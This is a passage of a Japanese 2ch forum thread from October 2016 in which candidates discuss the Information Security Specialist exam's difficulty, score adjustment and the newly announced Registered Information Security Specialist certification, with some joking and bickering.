>>840 高度の午前1も通れるとは思えないけどな
段階的に基本かITパスポートでも狙いに行くだろ
842 :
名無し検定1級さん
2016/10/21(金) 13:45:46.19 ID:bjeWOFJY
sgてそんな下に見られでたんだw
843 :
名無し検定1級さん
2016/10/21(金) 13:46:54.23 ID:w4d7BA4k
SGって合格率90%だよw
ITパスポートより簡単だよ
844 :
名無し検定1級さん
2016/10/21(金) 13:49:14.58 ID:S6n6yFf6
合格率で資格の難易度を論じるなら、医師は楽勝資格になるな
845 :
名無し検定1級さん
2016/10/21(金) 13:50:14.51 ID:bjeWOFJY
>>843 わかった
応用は無理だなw
訂正する。そうなると基本も厳しいか
特に午後
846 :
名無し検定1級さん
2016/10/21(金) 13:55:47.10 ID:ucn6G42S
>>843 情報処理試験をよく知らない人に
セスペも簡単なんだろ?
って思われたくないよな。
847 :
名無し検定1級さん
2016/10/21(金) 14:04:12.26 ID:VBECWjJR
今アメリカでセキュリティ人材不足が大問題になっているらしく、40代のエンジニアが年収4000万稼ぐんだとさ
848 :
名無し検定1級さん
2016/10/21(金) 14:12:38.13 ID:ANrx+XQs
地震死ぬかと思った
849 :
名無し検定1級さん
2016/10/21(金) 14:13:50.19 ID:Kn9GSHau
>>847 年収四千万のセキュリティエンジニアって、ランサムにやられたファイルの復号とか、公共サービスの脆弱性を見つけて直せるとか言う次元だよ。
850 :
名無し検定1級さん
2016/10/21(金) 14:19:23.64 ID:bjeWOFJY
851 :
名無し検定1級さん
2016/10/21(金) 14:22:04.95 ID:u2rJkeRW
>>530 お前新小岩の受験だろ!おっさんみたいな19歳だな
852 :
(*´∀`)情弱士
2016/10/21(金) 14:37:30.73 ID:3oKjZO/0
>>819 > SGからの移行(?)組が受かるような試験じゃないからなぁ
ウム。SGって合格率80%の原付免許と同じレベルの試験。
SCを5年くらい受け続けて合格しない場合にSGを受ける。
853 :
名無し検定1級さん
2016/10/21(金) 14:39:19.74 ID:ANrx+XQs
>>850 せやで
東日本のとき福島にいたから慣れてる感あったけど、やっぱりびびるわ
津波ないだけましやな
854 :
名無し検定1級さん
2016/10/21(金) 15:01:30.56 ID:w4d7BA4k
情報処理安全確保支援士の通称名
法律名:情報処理安全確保支援士
通称名:登録情報セキュリティスペシャリスト(登録セキスペ)
英語名:RegisteredInformationSecuritySpecialist(RISS)
855 :
(*´∀`)情弱士
2016/10/21(金) 16:03:12.40 ID:3oKjZO/0
856 :
(*´∀`)情弱士
2016/10/21(金) 16:05:44.92 ID:3oKjZO/0
>>855 平成28年10月24日(月) 栗鼠な方、登録受付開始
857 :
名無し検定1級さん
2016/10/21(金) 16:26:08.00 ID:ANrx+XQs
通称名:登録情報セキュリティスペシャリスト(登録セキスペ)
セ キ ス ペ ださい
858 :
(*´∀`)情弱士
2016/10/21(金) 16:43:11.32 ID:3oKjZO/0
なぜ、★4つなんだろうか? RISSが4文字だから?
米の旗は州の数だけど、★は何だろうねぇ
859 :
名無し検定1級さん
2016/10/21(金) 16:48:01.18 ID:UcgR1JX+
860 :
名無し検定1級さん
2016/10/21(金) 16:50:39.80 ID:VBECWjJR
>>859 レベル4かよ、理由がローカルすぎてワロタ
861 :
名無し検定1級さん
2016/10/21(金) 16:52:37.30 ID:Lf5u2fMA
特撮戦隊基地扉の上にありそうな模様
いいね
862 :
名無し検定1級さん
2016/10/21(金) 16:59:26.15 ID:7VG26hY9
情報セキュリティアドミニストレータはLV4じゃないから除外は当然だったなw
863 :
(*´∀`)情弱士
2016/10/21(金) 17:02:19.07 ID:3oKjZO/0
栗鼠も土方だろ、って思えてきた。
なんか有ったら日曜の朝7時に出てきてキーボード打っていそうだもん。
864 :
(*´∀`)情弱士
2016/10/21(金) 17:14:26.53 ID:3oKjZO/0
>>855 CSマークやチョコボールには銀色と金色がある。
栗鼠ワッペンは銀色だな。 5回合格した者だけ金栗鼠。。。
865 :
(*´∀`)情弱士
2016/10/21(金) 17:26:29.53 ID:3oKjZO/0
賞味期間2年の栗鼠は栗鼠であることを維持するためにSC試験を毎回受験する。
栗鼠であり続け、5回賞味期限を延長できた者(最短で2年半、最長は10年)だけが金栗鼠となる。
受験ビジネスだなぁ。。。。
866 :
名無し検定1級さん
2016/10/21(金) 17:32:36.84 ID:6LBAsMa6
867 :
(*´∀`)情弱士
2016/10/21(金) 17:37:18.48 ID:3oKjZO/0
868 :
名無し検定1級さん
2016/10/21(金) 18:04:52.31 ID:z0LyKs9Z
栗鼠を流行らせたいのかすごく連呼してるなw
869 :
名無し検定1級さん
2016/10/21(金) 18:37:42.01 ID:kw/fjtzV
わざわざRISSを栗鼠と書いたりするのは2chの一部だけだろうな
呼び方が変わるかどうかも怪しい
通称はセキュリティスペシャリストがまんま使われてるし
870 :
名無し検定1級さん
2016/10/21(金) 18:48:01.96 ID:cwp7WlkE
871 :
(*´∀`)情弱士
2016/10/21(金) 18:48:04.51 ID:3oKjZO/0
872 :
名無し検定1級さん
2016/10/21(金) 18:54:57.01 ID:Kn9GSHau
セスペと応用、両方受けたことがある人に質問。
部分点とかの扱いは両者で似てる?
それとも似てない?
予想できないから気になる。
873 :
名無し検定1級さん
2016/10/21(金) 19:01:02.32 ID:ZnkT2i8q
874 :
名無し検定1級さん
2016/10/21(金) 19:07:49.12 ID:ejT3YUyh
>>872 応用は部分点貰えるほど個々の配点が無いと思うが
875 :
(*´∀`)情弱士
2016/10/21(金) 19:09:16.48 ID:3oKjZO/0
876 :
名無し検定1級さん
2016/10/21(金) 19:23:51.95 ID:OXet5aJG
ほんとにわかってないね。
合格は、60点以上じゃなくて、60%以上となってるよね。
単純な点数で合格決めてるわけじゃないよね。
877 :
名無し検定1級さん
2016/10/21(金) 19:28:39.41 ID:VBECWjJR
878 :
名無し検定1級さん
2016/10/21(金) 19:30:26.03 ID:sIZ7IYvU
879 :
名無し検定1級さん
2016/10/21(金) 19:33:08.56 ID:L03O3T2W
ワロタ
880 :
名無し検定1級さん
2016/10/21(金) 19:38:36.66 ID:9Q+nyFF1
>>876 きみ思い込みで仕事するなって言われない?
881 :
名無し検定1級さん
2016/10/21(金) 19:45:40.94 ID:yih9wk8U
午後1問1設問3(2)
TAC解答例では「同一モデル機器でなりすまし接続する」だけど
問題文は「SSHのホスト鍵が同一モデルで全て同じ」なんだから
受動的に「機器になりすまして接続させる」のではないかな。
細かいことなんだけど気になった。
882 :
名無し検定1級さん
2016/10/21(金) 19:45:46.99 ID:OXet5aJG
合格・不合格通知表で60パーセンテージ以上で合格って書いているんだよ。
883 :
名無し検定1級さん
2016/10/21(金) 19:48:32.78 ID:I+9QBBhn
仮にそう書いてあったとしても、100点満点の60%って何点だよ
884 :
名無し検定1級さん
2016/10/21(金) 20:00:02.97 ID:9Q+nyFF1
885 :
名無し検定1級さん
2016/10/21(金) 20:01:35.10 ID:w4d7BA4k
合格者はAIがサイコロを振って決めているんだよ
886 :
名無し検定1級さん
2016/10/21(金) 20:17:38.19 ID:80sEq786
A6さん…
887 :
名無し検定1級さん
2016/10/21(金) 20:21:32.68 ID:dKoiyqwR
どうせ100点満点以外ないんだし、
60%も60点も同じだわな
888 :
名無し検定1級さん
2016/10/21(金) 20:38:40.87 ID:rGfUz/ww
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](https://www.lancork.net/wordpress/wp-content/uploads/2013/11/2012-sc-exam-result.png)
こういうのか、60点以上じゃなく60パーセンテージ以上となってるな
なんか意味あるんかな?得点調整済得点というところかな?
889 :
名無し検定1級さん
2016/10/21(金) 20:41:12.70 ID:L7in5X1b
60点を以上か以下かどうかは
試験の全体としての出来がipaの基準を超えるかどうかってだけで
各問題の配点がとか言ってる時点でナンセンスだわ
890 :
名無し検定1級さん
2016/10/21(金) 20:42:27.88 ID:VBECWjJR
そもそも876が、なぜこれを持ち出して(分かってない)などと他を非難し始めたのか、それが不明なんだよね
891 :
名無し検定1級さん
2016/10/21(金) 20:43:32.02 ID:o5/VZsXY
>>889 そんなんIPAに踊らされてる以外の何者でもない
北朝鮮に行ったら絶対金なんとかに服従の人生だろうな
892 :
名無し検定1級さん
2016/10/21(金) 20:45:37.90 ID:rGfUz/ww
下駄、下駄って得点甘くならないか?って言ってるからじゃない?
午後は、60点以上取れば合格という甘いもんじゃなく、
午後1で上位4割、午後2で上位5割にはいる得点を取らないと、得点調整で不合格になるよってことだろ。
893 :
名無し検定1級さん
2016/10/21(金) 20:46:53.50 ID:VBECWjJR
だからと言って、60パーならいい、という理屈にはならんだろう
894 :
名無し検定1級さん
2016/10/21(金) 20:47:38.73 ID:VBECWjJR
なぜ点とパーセントにこだわったのだろう?
895 :
(*´∀`)情弱士
2016/10/21(金) 20:54:01.69 ID:3oKjZO/0
896 :
(*´∀`)情弱士
2016/10/21(金) 20:56:32.21 ID:3oKjZO/0
897 :
名無し検定1級さん
2016/10/21(金) 20:57:06.14 ID:MSZJ42O5
みんな自己採点で60点以上になったと言って喜べば良いのさ…
本当の悲しみを味わうのは合格発表の時だからね…
不条理な逆下駄を味わうが良いさ
898 :
名無し検定1級さん
2016/10/21(金) 20:58:17.20 ID:+14aSEuL
なにこの基準がガバガバな試験
899 :
名無し検定1級さん
2016/10/21(金) 21:01:05.36 ID:L03O3T2W
後2ヶ月も逆下駄に怯えなきゃいけないのか・・・
900 :
名無し検定1級さん
2016/10/21(金) 21:02:05.24 ID:rGfUz/ww
901 :
名無し検定1級さん
2016/10/21(金) 21:03:13.08 ID:R4JoJuWi
下駄がないと厳しいのに逆下駄に怯えてなんかいられない
我ながら前向きな精神だわ(錯乱)
902 :
名無し検定1級さん
2016/10/21(金) 21:04:31.94 ID:rGfUz/ww
903 :
名無し検定1級さん
2016/10/21(金) 21:05:07.09 ID:q4Is2Zqa
>>862 初年度一発合格した私に謝れ
公式情報以外に参考書が2冊しか出ていなくて大変だったんだぞ
904 :
名無し検定1級さん
2016/10/21(金) 21:06:42.57 ID:rGfUz/ww
IPAのサイトもいつのまにか更新来てた
https://www.jitec.ipa.go.jp/ 「情報処理安全確保支援士試験」の対象者像、出題範囲等を公開しました new
平成29年度春期試験から実施する新たな国家試験「情報処理安全確保支援士試験」の「試験要綱」「シラバス」等を公開しました。
・試験要綱・シラバス など
・参考リンク:経済産業省からのお知らせ(サイバーセキュリティ分野において初の国家資格となる「情報処理安全確保支援士」制度を開始しました)
905 :
名無し検定1級さん
2016/10/21(金) 21:06:57.66 ID:+14aSEuL
セキュアド持ってるやつはもうとっくに出世してるだろうし安全支援士なんて今更いらんだろ
906 :
名無し検定1級さん
2016/10/21(金) 21:11:47.45 ID:L7in5X1b
>>891 わかいなぁ
せいぜい頑張って抗ってくれww
907 :
(*´∀`)情弱士
2016/10/21(金) 21:15:44.87 ID:3oKjZO/0
>>904 <情報処理安全確保支援士試験>※ 2016年10月21日掲載
「情報処理安全確保支援士試験」シラバス(Ver 1.0)PDF形式
明日、前と変化ないのか見比べるか・・。落ちたときは、4月に受験すると思うし。
908 :
名無し検定1級さん
2016/10/21(金) 21:17:36.67 ID:5KiRE9Qa
登録セキスペってダサすぎるだろ
登録セスペか登録セキュスペにしろよ
909 :
名無し検定1級さん
2016/10/21(金) 21:18:43.21 ID:+14aSEuL
セキスペ、セキュスペってなんでダサいのか説明できないけどダサい。登録が付くと更にださい。理由はわからない
910 :
名無し検定1級さん
2016/10/21(金) 21:20:04.44 ID:L03O3T2W
滑舌が悪くてキがうまく言えないのでセスペでお願いします!
911 :
名無し検定1級さん
2016/10/21(金) 21:21:58.53 ID:1TjIcUag
912 :
名無し検定1級さん
2016/10/21(金) 21:23:40.69 ID:dKoiyqwR
支援士って名前が相当評判悪かったのかな
セキュリティスペシャリストの名前引きずるなら新試験にする意味なくない?
913 :
名無し検定1級さん
2016/10/21(金) 21:29:16.60 ID:L7in5X1b
914 :
名無し検定1級さん
2016/10/21(金) 21:29:22.87 ID:w4d7BA4k
デタスぺは可哀そう
915 :
名無し検定1級さん
2016/10/21(金) 21:49:42.49 ID:6TPjzB1M
>サイバーセキュリティーに初の国家資格
セキュスペはなんだったんだよ
あくまで国家試験の合格であって国家資格ではないってこと?
916 :
名無し検定1級さん
2016/10/21(金) 21:53:17.47 ID:+14aSEuL
917 :
名無し検定1級さん
2016/10/21(金) 21:54:41.15 ID:u3RTC/y4
本屋になんとか支援師の対策本が並んでる様子も違和感ありまくりだった
918 :
名無し検定1級さん
2016/10/21(金) 21:55:30.72 ID:+14aSEuL
次これが出ます
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](http://fsm.vip2ch.com/-/hirame/hira122243.jpg)
919 :
名無し検定1級さん
2016/10/21(金) 22:01:56.85 ID:AE1Vf90q
iTECの方がTACより記述問題の比重が大きいけど、実態に近いのはこっちかな?
920 :
名無し検定1級さん
2016/10/21(金) 22:17:45.58 ID:LOByTa93
>>919 全部の試験がこんな感じよ
真相は闇の中
921 :
名無し検定1級さん
2016/10/21(金) 22:19:33.49 ID:TCCpY5RR
>>737 年取ったら人間丸くなるって、絶対ウソ
自分は年取ってから以前よりクレーマーになっている
922 :
名無し検定1級さん
2016/10/21(金) 22:21:12.08 ID:ZnkT2i8q
26はおっさんですか?
923 :
名無し検定1級さん
2016/10/21(金) 22:24:04.75 ID:razh+W/E
924 :
名無し検定1級さん
2016/10/21(金) 22:26:36.61 ID:SdpifACh
>>921 今は男女ともに更年期があるからw
若年性もあるっけ?
925 :
名無し検定1級さん
2016/10/21(金) 22:28:11.24 ID:TCCpY5RR
>>862 セキュアド除外理由は、年数が経ちすぎて陳腐化したからでは?
926 :
名無し検定1級さん
2016/10/21(金) 22:31:54.10 ID:w4d7BA4k
>>925 それが理由ならテクニカルエンジニア(情報セキュリティ)試験も除外されるでしょ
927 :
名無し検定1級さん
2016/10/21(金) 22:36:19.01 ID:p/CPAFjT
>>903 ネットワークスペシャリストから逃げたのか…(´・ω・`)
928 :
名無し検定1級さん
2016/10/21(金) 22:39:56.04 ID:Ia64dr1I
929 :
名無し検定1級さん
2016/10/21(金) 22:44:08.50 ID:w4d7BA4k
2016年10月21日 「情報処理安全確保支援士試験」の対象者像、出題範囲等を公開しました new
平成29年度春期試験から実施する新たな国家試験「情報処理安全確保支援士試験」の「試験要綱」「シラバス」等を公開しました。
930 :
名無し検定1級さん
2016/10/21(金) 22:48:05.89 ID:TCCpY5RR
セキュアドが除外でも、別に困らない
931 :
名無し検定1級さん
2016/10/21(金) 23:06:34.04 ID:q4Is2Zqa
>>927 迷った挙句、初物に惹かれたんだよ
テクネは翌年までおあずけ
932 :
名無し検定1級さん
2016/10/21(金) 23:11:57.53 ID:XeyjYU1u
セスペ廃止って言った奴
土下座しろ
933 :
名無し検定1級さん
2016/10/21(金) 23:16:18.79 ID:o5/VZsXY
>>923 頭真っ赤になってる首
怖い人は怖いかも
934 :
名無し検定1級さん
2016/10/22(土) 00:15:09.31 ID:AEZfV6+q
栗鼠ってエロいよな、エロ過ぎだよな。
セキスペって、文字列のナカにキスがあるし、セクスペにも近いし。
栗鼠も、RISSと併記されると栗とRISSにしかみえない。
935 :
名無し検定1級さん
2016/10/22(土) 00:17:23.37 ID:AEZfV6+q
ちなデスペは敢えて4文字で表すならデタスペではなくデベスペやで!
936 :
名無し検定1級さん
2016/10/22(土) 00:23:28.29 ID:5wHgYwMP
新たな国家資格「情報処理安全確保支援士」の試験を2017年4月より実施
サイバーセキュリティ基本法と情報処理促進法の改正受け
経済産業省は14日、「サイバーセキュリティ基本法」および「情報処理の促進に関する法律(情報処理促進法)」の一部を改正し、21日より施行することを発表した。
あわせて「情報処理安全確保支援士(以下、支援士)」を新設し、2017年4月より試験を実施する。受験手数料は5700円。
支援士は、サイバーセキュリティ基本法が規定するサイバーセキュリティ確保のための事業者や利用者による取り組みに対し、
必要な情報の提供や助言を行ってサイバーセキュリティの確保を支援する国家資格として、情報処理促進法の第6〜28条で規定されている。
取り組みの実施状況についての調査・分析・評価や、その結果に基づいた指導なども行う。
経済産業省では同支援士制度の創設について、すでに4月に発表済み。情報処理を推進する国家資格と位置付けている。
試験の実施を担当する独立行政法人情報処理推進機構(IPA)が6月に発表している資料によれば、支援士試験の内容は「情報処理技術者試験」の「情報セキュリティスペシャリスト(SC)試験」をベースとしたものになり、合格者は支援士の有資格者となる。
現在実施されているSC試験は2016年10月期の実施をもって終了する。なお、支援士の有資格者は、SC試験の前身である「情報セキュリティアドミニストレータ試験」、「テクニカルエンジニア(情報セキュリティ)試験」の合格者も含まれる。
有資格者は、一般に公開される支援士登録簿への登録が可能になる(手数料1万700円)ほか、情報処理安全確保支援士の名称を独占使用できる。支援士の資格は、一定期間が経過するごとに講習を受講することで更新できる。
登録事項の変更手数料は900円となる。そのほかの詳細は10月24日にIPAより公表される予定。
なお、情報セキュリティ担当者向けの資格である「情報セキュリティマネジメント試験」は、引き続き情報処理技術者試験として実施される。
937 :
名無し検定1級さん
2016/10/22(土) 00:23:42.17 ID:5wHgYwMP
経済産業省ではサイバーセキュリティ基本法の改定について、近年サイバー攻撃が増加・巧妙化傾向にあり、社会全体のサイバーセキュリティ強化へ向け、政府機関が中心となって人材の確保・育成や情報共有などの基盤整備を推進することが急務としている。
サイバーセキュリティ基本法改定の内容は、第13条で国が行う不正な通信の監視、監査、原因究明調査などの対象範囲を拡大することを規定した上で、第30条でサイバーセキュリティ戦略本部の一部事務をIPAなどに委託できるようにしている。
情報処理促進法ではこれを受け、第43条で、サイバーセキュリティ戦略本部から委託を受けるIPAの業務や、現在でもIPAが行っているソフトウェア脆弱性情報の公表の方法や手続きが整備されている。
なお、改正されたサイバーセキュリティ基本法では、日本年金機構など9の法人について、政府機関情報セキュリティ横断監視・即応調整チーム(GSOC)による監視対象とすることも、あわせて規定されている。
938 :
名無し検定1級さん
2016/10/22(土) 02:16:30.59 ID:Qaapvqzp
939 :
名無し検定1級さん
2016/10/22(土) 04:23:44.97 ID:m7nNwCnt
940 :
アホスタマン
2016/10/22(土) 06:46:00.19 ID:eY9XoUTW
パンパンパンパンパンパンパンパンパンパンパン…
あれ?イカないなぁ…
941 :
名無し検定1級さん
2016/10/22(土) 06:58:01.26 ID:x2mKS4Ms
支援士でセキュアドが外されたってことは
これからは技術系の問題が多く出題されるってことだな
942 :
名無し検定1級さん
2016/10/22(土) 07:06:21.69 ID:cE4k3FSh
今回の試験でも技術系の問題は多くなかったか?
午後1は問1,2が技術系の知識を問うものだったし、
午後2も久しぶりにカード認証が出てきたし。
まあ、求める人物像を見る限り、運用系も残して行きそうだけど。
943 :
(*´∀`)情弱士
2016/10/22(土) 07:15:36.13 ID:u7mS14Dp
944 :
名無し検定1級さん
2016/10/22(土) 07:17:01.25 ID:x2mKS4Ms
俺は運用系の問題で受かったから技術系の暗記型は嫌だなw
945 :
名無し検定1級さん
2016/10/22(土) 07:19:42.11 ID:abYg4j3a
技術系2:運用系1くらいが理想なんじゃね
今回の午後1みたいに
946 :
名無し検定1級さん
2016/10/22(土) 07:26:48.20 ID:yBPs14w7
資格2chには、まことしかいないと言われて
まことって誰?と言うのは
まことしかいないから言えるんだろww
947 :
(*´∀`)情弱士
2016/10/22(土) 07:30:05.85 ID:u7mS14Dp
>>943 シラバスの差異は、
試験の名前と、作成日付くらいかな。見た感じでは
948 :
名無し検定1級さん
2016/10/22(土) 07:51:02.66 ID:cE4k3FSh
>>945 今回の午後1は明らかにアンバランスだったけどね。
技術問題が細かい知識を問うのに、運用問題は国語問題としても簡単だったから。
949 :
名無し検定1級さん
2016/10/22(土) 08:04:39.85 ID:Wn6W0tKn
>>948 機能から何度も出てるけど、問題が簡単か、難しいかで60点取れるかどうかでなく、上位40〜50%に入れるかどうかでしょ
950 :
名無し検定1級さん
2016/10/22(土) 08:08:31.58 ID:cE4k3FSh
特定の問題を選択した人が上位に固まったら、さすがに調整は必要だと思うけどね。
応用の時はやってる気配がなかったけど、その点はどうなってんだろう。
951 :
名無し検定1級さん
2016/10/22(土) 08:25:56.03 ID:Wn6W0tKn
同じ国が実施して、最大の試験であるセンター試験と同じではないだろうか?
センター試験 「得点調整」 の基本的な考え方
http://eic.obunsha.co.jp/viewpoint/201503viewpoint/ 【得点調整の方法】
? 得点調整は、各選択科目間で、原則として、「20点以上の平均点差が生じ、
これが試験問題の難易差によるものと認められる場合」に行う。
? 得点調整に当たっては、公平性の観点から、調整後も「各科目の平均点の
順序を変えないこと」とし、「20点以上の平均点差が生じた科目だけでなく、
平均点がその間にある科目」についても調整を行う。
? 最高平均点科目と最低平均点科目との「平均点差が15点(通常起こり得る
平均点差の範囲)」となるよう調整する。その際、「平均点がその間にある科目」に
ついても、素点の「平均点差の比率」に応じて調整する。
? 得点調整に当たっては、「0 点は0 点、100点は100点」に固定する。
? 得点調整に当たっては、最高平均点科目の得点の累積分布を目標分布とし、
調整すべき科目の得点の累積分布を目標分布の方向へ移動させる方法
(「分位点差縮小法」)を用いて行う(具体的な調整の方法は別記参照)。
952 :
(*´∀`)情弱士
2016/10/22(土) 08:27:29.27 ID:u7mS14Dp
>>949 点数だよ。
午後Tから手作業による採点で2万人くらいにへらして、
午後Uで1万人くらいに減らしてから、最終調整で8000人くらいへ。
953 :
名無し検定1級さん
2016/10/22(土) 08:29:23.77 ID:Wn6W0tKn
自己スレだけど、この方法だと、もう少し、合格率が上にブレることがあってもおかしくないから、違うかもしれないね。
954 :
名無し検定1級さん
2016/10/22(土) 08:32:11.30 ID:Wn6W0tKn
>>952 不合格者を、60点以下にしないといけないから、なんらかの調整はあるんじゃない?
955 :
(*´∀`)情弱士
2016/10/22(土) 08:32:50.41 ID:u7mS14Dp
受験番号順に採点されていたら、どう考えても辛めに採点するでしょ。
受験番号は遅い方が有利。
956 :
(*´∀`)情弱士
2016/10/22(土) 08:35:17.35 ID:u7mS14Dp
一回辛めに採点した解答用紙を、再度探して〇にするとかしないでしょ。
午後Uの採点枚数を減らすのが目的だから。
だから、受験番号はやや後ろのほうが有利。
957 :
名無し検定1級さん
2016/10/22(土) 08:39:15.31 ID:abYg4j3a
考えても仕方ない
958 :
名無し検定1級さん
2016/10/22(土) 08:39:18.25 ID:uza6lQfM
得点調整とか言ってるやつは間違いなく落ちる。なぜ試験後に頑張り始めるのか
959 :
名無し検定1級さん
2016/10/22(土) 08:44:32.96 ID:cE4k3FSh
資格試験に限らず、論述試験には採点マニュアルがあるから、受験番号は関係ないと聞いたことがある。
ただ、今回の試験みたいに解釈が割れたり、別解がある場合の扱いは気になるなあ。
司法試験や会計士試験だと、少数説の存在は認めても採用はすべきでないという見解があるけど
技術系の試験ではそういう主張はできないし。
960 :
(*´∀`)情弱士
2016/10/22(土) 08:48:35.84 ID:u7mS14Dp
>>959 午後Tの採点はを10人毎に4名は合格させる事。
というようなルールだと嬉しい。周りの席が優秀すぎたら落ちるけど・・。
961 :
名無し検定1級さん
2016/10/22(土) 08:53:23.22 ID:gcy7uBy7
>>958 「間違いなく」とは何を根拠に言っているのか
得点調整について考察することと試験の合否に何の関係性があるのか
962 :
名無し検定1級さん
2016/10/22(土) 08:56:29.72 ID:uza6lQfM
963 :
名無し検定1級さん
2016/10/22(土) 09:03:54.30 ID:gcy7uBy7
>>962 得点調整について議論してる人はクレーマーなのか
964 :
名無し検定1級さん
2016/10/22(土) 09:04:40.57 ID:cE4k3FSh
単なる荒らしだろ
他のスレにもいるよ
965 :
名無し検定1級さん
2016/10/22(土) 09:06:37.76 ID:uza6lQfM
>>963 そうだよ。それ以外で得点調整についての考察なるものにどんな意味があるのか教えて欲しいね
試験の不透明性が半端ないからそういうクレーマーが湧くのは仕方ないけどね
966 :
名無し検定1級さん
2016/10/22(土) 09:11:17.72 ID:1A5AXE2W
過去の例からすると、配点予想はTACとITEC、どっちが信憑性あるんだ?
967 :
名無し検定1級さん
2016/10/22(土) 09:14:31.07 ID:cE4k3FSh
>>965 とりあえずクレームの意味を100回読んでから出直して来い。
>>966 俺の感覚だと大差ない。
応用までの感想だけど。
968 :
名無し検定1級さん
2016/10/22(土) 09:17:44.63 ID:uza6lQfM
クレームの意味を1000万回読み直して見たけど一切間違ってなかった
969 :
名無し検定1級さん
2016/10/22(土) 09:22:18.08 ID:cE4k3FSh
クレーム
クレームとは、購入した商品・サービスに意見や不満をもつ顧客が、それを提供した企業に対して問題点を指摘したり、苦情を述べたり、損害賠償を要求したりする行為。
または、その内容のこと。 商品・サービスについて何らかの意見や不満をもつ人のうち、実際にそれをクレームの形で企業に伝えてくる人はごく一部であり、多くの人は何も言わずに他の企業の商品・サービスに乗り換える。
したがって、こうした客離れを防ぐために、企業は顧客のクレームに耳を傾け、有意義な情報として活用する必要がある。
何も指摘したり要求したりしてないのに、何がクレームなんだろう。
ただの分析じゃん。
970 :
名無し検定1級さん
2016/10/22(土) 09:37:53.29 ID:g2H781H+
結局難易度は例年として比較してどうだったんだろう
過去レスみるも
午後1
問1 難
問2 易
問2 易
午後2
問1 ?
問2 易
午後1問3と午後2問2は、易といいつつ高レベルの国語の問題含んではいるが
971 :
名無し検定1級さん
2016/10/22(土) 09:39:03.28 ID:g2H781H+
誤字ひどいけど察して
972 :
名無し検定1級さん
2016/10/22(土) 09:42:23.49 ID:cE4k3FSh
午後2の1はやや易〜普通だと思う
基本的には、過去問の寄せ集めみたいな問題だから
試験対策をきちんとしてたら合格点には乗るだろうし。
あと、午後1問3もやや易かな?
国語の問題というだけじゃなくて、紛らわしい問題が含まれてるし。
973 :
名無し検定1級さん
2016/10/22(土) 09:46:47.22 ID:AQRuKFmT
引っ掛け問題多すぎて悩んだ
974 :
名無し検定1級さん
2016/10/22(土) 09:50:53.11 ID:cE4k3FSh
>>973 どの試験?
自分は論述系、中でも午後1問1に多いと思ったけど
975 :
名無し検定1級さん
2016/10/22(土) 09:51:22.77 ID:g2H781H+
こんな感じかねぇ
午後1
問1 難
問2 易
問3 やや易
午後2
問1 やや易〜普通
問2 やや易
976 :
名無し検定1級さん
2016/10/22(土) 09:55:25.56 ID:c5JhCHQv
えっ?午後IIって、問2の方が易しかったの?問1を選ばなかったことを後から激しく後悔しているんだけど。
977 :
名無し検定1級さん
2016/10/22(土) 09:58:44.79 ID:g9BBrqdO
978 :
名無し検定1級さん
2016/10/22(土) 09:59:40.99 ID:g2H781H+
てきとうに書いたからご意見募集。問1は解いてすらいないし。
午後1問1の難は言い過ぎかな。やや難くらいか
979 :
名無し検定1級さん
2016/10/22(土) 10:03:28.63 ID:cE4k3FSh
>>978 俺もやや難で同意。
論述のうち、細かい知識抜きで確実に解ける問題はsshと電子署名の二つくらいだし、あとは別解狙いじゃね?
980 :
名無し検定1級さん
2016/10/22(土) 10:10:05.60 ID:g2H781H+
じゃあこうだな
午後2について、どっちも解いた人いたら意見くれ
午後1
問1 やや難
問2 易
問3 やや易
午後2
問1 やや易〜普通
問2 やや易
981 :
名無し検定1級さん
2016/10/22(土) 10:33:45.16 ID:ZmETibje
午後2問2が易とかちょっとないわ
982 :
名無し検定1級さん
2016/10/22(土) 10:44:07.85 ID:uza6lQfM
午後2問2は最後だけ文脈嫁って問題で嫌らしいけど、それだけって感じ
983 :
名無し検定1級さん
2016/10/22(土) 10:53:31.55 ID:03pfg7v0
日本語の嫌らしさだけを基準にして難易度選定してるのかよ...
そりゃ知ってる人にとっては知識問題は簡単だけどな
984 :
名無し検定1級さん
2016/10/22(土) 10:57:35.38 ID:SicDMAis
>>983 午後1問1,3の評価と、午後2問1を解いたけど、
日本語云々抜きで、この難易度だと思うよ。
午後1問1は業務で端末に触らない運用系の人には辛い問題が多いし。
確か、IPAの発行する資料や過去問にもなかった問題がある。
むしろ、問3のマルウェアの方が気持ち悪いかな?
あちらは報告書で声高にアピールしてたネタだけど、
実務の対応が使えるか、扱いが見えないし。
985 :
名無し検定1級さん
2016/10/22(土) 11:01:43.53 ID:g2H781H+
午後2の大問を比較できるやつらおらんのか?
もしかしたら問2の難易度が普通?
自分の中で普通の基準がKerberosだからおかしいかも
986 :
名無し検定1級さん
2016/10/22(土) 11:05:57.17 ID:AgXlrIa9
午後2は問1は知識は浅いもので良くて特に高度な読解力も必要なくて少なくとも問2よりは簡単だったと思うが
推奨暗号リストのやつ以外は
お前ら初日と言ってること違いすぎ
987 :
名無し検定1級さん
2016/10/22(土) 11:14:11.87 ID:AvdfU5m/
じゃあ午後2はこんなかな
午後1
問1 やや難
問2 易
問3 やや易
午後2
問1 易〜やや易
問2 やや易〜普通
過疎ってるしわからんね
988 :
名無し検定1級さん
2016/10/22(土) 11:14:25.13 ID:xiD0hz7e
問2は苦手分野だから比較できないが、
過去問との比較なら、問1は少し厄介だと思った。
まあ、慣れの問題レベルだからやや易かもしれんが。
989 :
名無し検定1級さん
2016/10/22(土) 11:25:47.49 ID:f0lGwy1k
>>985 両方解いた俺をお呼びか
でも好みがあるから一概に比較できんなー…
午後2
1やや易
2並
990 :
名無し検定1級さん
2016/10/22(土) 11:26:27.06 ID:AQRuKFmT
自分の実務の分野とか好きで得意な分野とかで変わってくるんだろうから
一概には言えないけど午後1の問1は難しいと感じた
セスペ午後にはほとんど関係ないけど俺はマネジメント系が嫌いで全然覚えられない
991 :
名無し検定1級さん
2016/10/22(土) 11:34:48.04 ID:SicDMAis
>>990 マネジメント系がメインの運用、企画系社内情シスだけど、
マネジメント系の問題は業務を論理的に分析するテクニックがあれば問題文を深く読まなくても解けるよ。
今回の試験で言えば、認証カードに登録する個人情報の問題は、人事データの性質を知ってれば答えられるものだったし。
992 :
名無し検定1級さん
2016/10/22(土) 12:50:25.16 ID:5gKMK9me
午後2問1は普通程度に感じました
993 :
名無し検定1級さん
2016/10/22(土) 14:45:05.57 ID:C9Fal27g
994 :
名無し検定1級さん
2016/10/22(土) 14:50:37.87 ID:C7TpMr0g
